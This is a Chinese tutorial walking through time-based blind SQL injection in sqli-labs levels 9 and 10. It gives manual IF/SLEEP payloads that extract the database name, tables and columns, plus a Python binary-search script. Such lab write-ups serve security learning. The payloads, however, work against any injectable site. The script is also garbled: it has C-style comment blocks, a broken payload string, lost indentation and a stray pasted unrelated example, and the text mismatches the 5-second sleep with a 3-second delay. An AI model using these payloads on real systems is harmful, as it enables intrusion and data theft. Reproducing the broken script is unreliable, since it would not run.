目录
时间盲注(第九、十关)
1.判断
2.确认时间盲注
2.手工尝试时间盲注
数据库名长度
数据库名字符
表数
表名长度
表名字符
字段数
字段名长度
字段名字符
4.脚本时间盲注注入
5.第十关
时间盲注(第九、十关)
1.判断
当回显,报错显示,及布尔盲注都无法使用时,即无论怎么输入只有一个页面不会变化
2.确认时间盲注
使用的语法有:IF(condition, value_if_true, value_if_false)
测试是否存在时间盲注即闭合方式
单引号的时间盲注测试
?id=1' AND IF(1=1, SLEEP(5), 0) --+
发现页面会在加载中转圈圈3秒,说明有时间盲注,如果没有,则进行测试双引号时间盲注测试,一般不是单引号就是双引号,很少有单引号加括号,双引号加括号等等,这里测试是单引号闭合的时间盲注
?id=1" AND IF(1=1, SLEEP(5), 0) --+
2.手工尝试时间盲注
数据库名长度
注入数据库名,如果不对不会延时,正确则会延时
?id=1' and if(length(database())>4,sleep(5),1)--+
?id=1' and if(length(database())>8,sleep(5),1)--+
?id=1' and if(length(database())>6,sleep(5),1)--+
数据库名字符
?id=1'and if(ascii(substr((select database()),1,1))>80,sleep(5),1)--+
?id=1'and if(ascii(substr((select database()),1,1))>104,sleep(5),1)--+
?id=1'and if(ascii(substr((select database()),1,1))>116,sleep(5),1)--+
?id=1'and if(ascii(substr((select database()),1,1))=110,sleep(5),1)--+
?id=1'and if(ascii(substr((select database()),1,1))=114,sleep(5),1)--+
表数
?id=1'and if(((select count(*) from information_schema.tables where table_schema=database())>3),sleep(5),1)--+
?id=1'and if(((select count(*) from information_schema.tables where table_schema=database())>5),sleep(5),1)--+
表名长度
?id=1'and if(((select length(table_name) FROM information_schema.tables where table_schema=database() limit 1,1)>6),sleep(5),1)--+
?id=1'and if(((select length(table_name) FROM information_schema.tables where table_schema=database() limit 1,1)>8),sleep(5),1)--+
表名字符
?id=1'and if((ascii(substr((select table_name FROM information_schema.tables where table_schema=database() limit 0,1),1,1))>32),sleep(5),1)--+
字段数
?id=1'and if( ((select count(*) from information_schema.columns where table_schema= 'security' and table_name='users' )>2),sleep(5),1)--+
?id=1'and if( ((select count(*) from information_schema.columns where table_schema= 'security' and table_name='users' )>4),sleep(5),1)--+
字段名长度
?id=1'and if(((select length(column_name) from information_schema.columns where table_schema= 'security' and table_name='users' limit 1,1)>1),sleep(5),1)--+
字段名字符
?id=1'and if((ascii(substr((select column_name from information_schema.columns where table_schema= 'security' and table_name='users' limit 0,1),1,1))>32),sleep(5),1)--+
4.脚本时间盲注注入
import requests #用于发送HTTP请求
import time # 用于计算时间差
url = "http://127.0.0.1/sqli-labs/Less-8/" # 目标注入点URL
def inject_database(url):
name = ''
# 初始化空字符串,存储最终数据库名
for i in range(1, 100):
# 遍历字符位置(假设数据库名最长99字符)
low = 32
# ASCII可打印字符起始值(空格)
high = 128
# ASCII结束值(DEL字符,实际只用到127)
mid = (low + high) // 2
# 二分法初始中间值
while low < high:
# 二分查找当前字符的ASCII值
# 构造Payload:通过时间盲注判断字符ASCII值是否大于mid
payload = "
1' and ( if( ascii( substr( (select( database()) ),%d,1 ) )>%d,sleep(1),0 ) ) and ('1')=('1
" % (i, mid)
/**
" " 里面是构造的Payload
1' 闭合前面的单引号
if() 里面是判断字符的ASCII值是否大于mid
ascii() 将字符转换为相应的ACSII值
substr( (),%d,1) 获取()里面的字符集的第 %d 位开始的第一位字符,第一个%d(占位符)是代表i
select( database()) 查询获取当前的数据库名
()>%d 第二个也就是这个%d是mid
sleep( ) 查询暂停指定的秒数。通常用于测试或故意造成延迟
and ('1')=('1 闭合
% (i, mid) 为 Python 的字符串格式化语法,将变量 i(字符位置)和 mid(猜测的 ASCII 值)动态插入 Payload,实现自动化枚
*/
params = {"id": payload}
# 参数化请求
#params 定义 HTTP GET 请求的 URL 参数,键值对形式传递数据
#"id"目标网页接收的查询参数名(通常对应后端 SQL 查询的输入字段)
start_time = time.time()
# time.time() 记录请求时间戳 记录请求开始时间
r = requests.get(url, params=params)
# 发送HTTP GET请求
/**
base_url = "http://tieba.baidu.com/f?"
params = {"kw": "兔子", "pn": 100}
res = requests.get(base_url, params=params)
print(res.url)
# 输出:http://tieba.baidu.com/f?kw=兔子&pn=100:ml-citation{ref="1,3" data="citationList"}
*/
end_time = time.time()
# 记录请求结束时间
# 判断响应时间是否超过1秒(触发sleep(1))
if end_time - start_time > 1:
low = mid + 1
# 当前字符ASCII值 > mid,调整下限
else:
high = mid
# 当前字符ASCII值 <= mid,调整上限
mid = (low + high) // 2
# 更新中间值
# 当low >= high时,确定当前字符ASCII值为mid
if mid == 32:
# 若mid为32(空格),终止循环
break
name = name + chr(mid)
# 将ASCII转为字符并拼接
print(name)
# 实时输出当前结果
inject_database(url)
# 执行注入函数
5.第十关
测试时间盲注的闭合方式
单引号的时间盲注测试
?id=1' AND IF(1=1, SLEEP(5), 0) --+
发现页面会在加载中转圈圈3秒,说明有时间盲注,如果没有,则进行测试双引号时间盲注测试,一般不是单引号就是双引号,很少有单引号加括号,双引号加括号等等
?id=1" AND IF(1=1, SLEEP(5), 0) --+
这里测试是双引号
剩下的步骤和第九关一样
